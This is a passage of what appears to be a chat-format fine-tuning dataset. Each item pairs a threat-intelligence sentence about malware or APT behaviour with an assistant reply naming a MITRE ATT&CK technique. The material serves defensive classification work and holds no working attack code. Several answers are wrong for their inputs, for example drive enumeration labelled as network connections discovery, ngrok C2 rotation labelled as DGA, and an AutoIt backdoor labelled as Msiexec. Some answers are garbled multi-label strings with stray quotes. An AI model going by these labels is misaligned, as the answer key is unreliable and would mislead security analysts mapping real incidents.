}, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZeroT has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos can upload and download files to and from the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore can persist via a LaunchAgent." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2." }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can create a new service named msamger (Microsoft Security Accounts Manager)." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMess can use junk data in the Base64 string for additional obfuscation." }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It uses GetlogicalDrives to get a bitmask of all the drives available on the system, then iterates over each possible drive letter" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The original variant of FakeM generates network beacons to its C2 server that begin with a 32-byte header that in most cases is meant to blend into network traffic generated by legitimate applications. Following this 32-byte header, the original variant of FakeM includes data encrypted using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used tools to deploy additional payloads to compromised hosts." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Security Intelligence . Topics . Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations . TrickBot is a new banking Trojan. An Unusual Man-in-the-Browser Technique . Nowadays, most modern financial malware families are capable of injecting malicious code into ongoing browser sessions (e.g. For this purpose, and much like other advanced banking Trojans, TrickBot deploys a browser-hooking engine designed to intercept communications to and from the victim’s internet browser. With the real-time fetching trick, the malicious code injections themselves are kept securely on the attacker’s server, not in a file on the victim’s endpoint. 7) Finally, TrickBot’s financial module replaces the original response that would normally come from the bank with the C2’s response, and the injected page is displayed on the victim’s end. The actor can turn the webinjections on or off on the fly, easily modify the injections and then push an update to some or all the infected victims instantaneously. Figure 2: TrickBot’s Server Side Web-Injects — Top Level Flow. Figure 5: TrickBot and Dyre both use “sourcelink” and “sourcequery” for their communications. TrickBot passes the target URLs list to its financial module, which is injected into the browser using pipes communication. A redirection attack, in short, means that instead of injecting malicious code into the original webpage, the victim is now redirected to a new site forged by the fraudsters" }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has collected data from remote systems by mounting network shares with \"net use\" and using Robocopy to transfer data." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA uses \"tasklist /svc\" to display running tasks." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has installed updates and new malware on victims." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum has used DriveLetterView to enumerate drive information." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks" }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This links the previous samples with this unique username" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hides base64-encoded and encrypted C2 server locations in comments on legitimate websites." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cleaver has been known to dump credentials using Mimikatz and Windows Credential Editor." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor contains functionality to query the local/system time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration." }, { "role": "assistant", "content": "T1074 - Data Staged', 'T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects the hostname of the victim machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor can enumerate all connected drives." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT can list local services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack removes itself after execution and can delete files on the system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware." }, { "role": "assistant", "content": "T1587.002 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Samples compiled in 2017 and 2018 were hard-coded with specific URI patterns to communicate with the C2 server via HTTP POST requests" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aquatic Panda has attempted to discover services for third party EDR products." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sykipot uses SSL for encrypting C2 communications." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind obtains the number of removable drives from the victim." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS copies files with certain extensions from USB devices to\na predefined directory." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Socksbot can take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the malware is downloaded and files verified, the script will check in the C:\\Program Files\\ directory for the presence Avast antivirus, which happens to be the most common installed AV worldwide" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used Themida to pack malicious DLLs and other files." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has gathered credentials using Mimikatz and ProcDump." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon has used WMIC.exe for lateral movement." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some samples install themselves as services for persistence by calling WinExec with the net start argument." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Checks if the user has Administrator privilege 2) Drops the Cobalt Strike Stager in debug or “%TEMP%” directory as “tmp_FlVnNI.dat” depending on the user privilege 3) Opens the decoy Word document 4) Locates the InstallUtil.exe and its installed version 5) Copies “schtasks.exe” to “%TEMP%” directory and renames it to “wtask.exe” 6) Creates Scheduled tasks with the name “Security Script kb00855787” 7) Renames “wscript.exe” into “winwsh.exe” 8) Runs the scheduled task to execute the Cobalt Strike Stager 9) C2 communication" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before executing the main payload, the QakBot loader will first test the infected system to see if it is a good candidate for infection. Figure 5 below shows a high-level execution flow of the QakBot loader" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1518.001 - Software Discovery: Security Software Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rifdoor has created a new registry entry at \"HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics\" with a value of \"C:\\ProgramData\\Initech\\Initech.exe /run\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 modified timestamps of backdoors to match legitimate Windows files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has dropped and executed SecretsDump to dump password hashes." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic has used the command \"Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden\" to hide its window." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This activity is performed after the implants are in place to force users to reauthenticate. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document" }, { "role": "assistant", "content": "T1584.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used social media platforms to hide communications to C2 servers." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stolen Pencil has used tools that are capable of obtaining credentials from saved mail." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API." }, { "role": "assistant", "content": "T1595.002 - Vulnerability Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a command-line interface to interact with systems." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NetTraveler reports window names along with keylogger information to provide application context." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Out1 can use native command line for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The string “fjzmpcjvqp” is unique and not something likely to be present if the code was not generated with the same public POC exploit code" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat is capable of deleting Registry keys used for persistence." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host', 'T1070.009 - Clear Persistence" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot can collect files and information from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Obscure secure messaging client as delivery vehicle for malware and cloak for malicious activity" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The executables installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky" }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman can track key presses with a keylogger module." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Generate payloads in various formats: Format Architecture Short Name Android Package x86 & ARMv7 apk Linux Binary x86 lin_x86 Linux Binary x64 lin_x64 Linux Shared Object x86 so_x86 Linux Shared Object x64 so_x64 Windows PE Executable x86 exe_x86 Windows PE Executable x64 exe_x64 Windows DLL x86 dll_x86 Windows DLL x64 dll_x64 Python Script x86 & x64 py PyInstaller x86 & x64 pyinst Python Oneliner x86 & x64 py_oneliner Powershell x86 & x64 ps1 Powershell Oneliner x86 & x64 ps1_oneliner Ducky Script N/A rubber_ducky Deploy in memory from a single command line using python or powershell one-liners" }, { "role": "assistant", "content": "T1106 - Native API', 'T1010 - Application Window Discovery', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "xCaon has used Base64 to encode its C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As Hui explains, this happens because ngrok.io URLs stay online for only around 12 hours, and by the time security researchers identify a new C&C URL, the ngrok.io link changes to a new one, hiding the botnet from researchers once more. This allows the botnet to survive more than other botnets that host C&C servers on popular hosting platforms where security firms can usually intervene via abuse requests" }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RAR archiving – files are transferred to staging servers before exfiltration. Certutil – a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind – a command-line tool that can be used to perform Active Directory queries. Csvde – can be used to extract Active Directory files and data. Ntdsutil – can be used as a credential-dumping tool. WMIExec – can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can use a Registry Run Key and the Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used a cloud-based remote access software called LogMeIn for their attacks." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to download an encrypted binary from a specified domain." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot)." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors behind Agent Tesla campaigns have also used malicious Office documents to facilitate first-stage delivery. Specially-crafted documents, exploiting Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570, have been leveraged, even in present day campaigns. These and similar exploits allow for quick delivery and execution with minimal user interaction (beyond opening the malicious documents and allowing active content to proceed" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The document also contained a lure image, similar to ones commonly found in malicious macro documents which ask the user to click on “Enable Content” as seen in Figure 2" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has also used PowerSploit's \"Invoke-ReflectivePEInjection.ps1\" to reflectively load a PowerShell payload into a random process on the victim system." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie', 'T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of configuring itself as a service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zirconium is using what are referred to as web bugs, or web beacons, tied to a domain they purchased and populated with content. Although the domain itself may not have malicious content, the web bug allows Zirconium to check if a user attempted to access the site" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GCMAN uses VNC for lateral movement." }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The organization managed to discover what scripts were hosted on the server before BE/SandWorm gang deleted them, and unfortunately couldn’t restore them after they were deleted" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has used spearphishing attachments to distribute its malware." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: 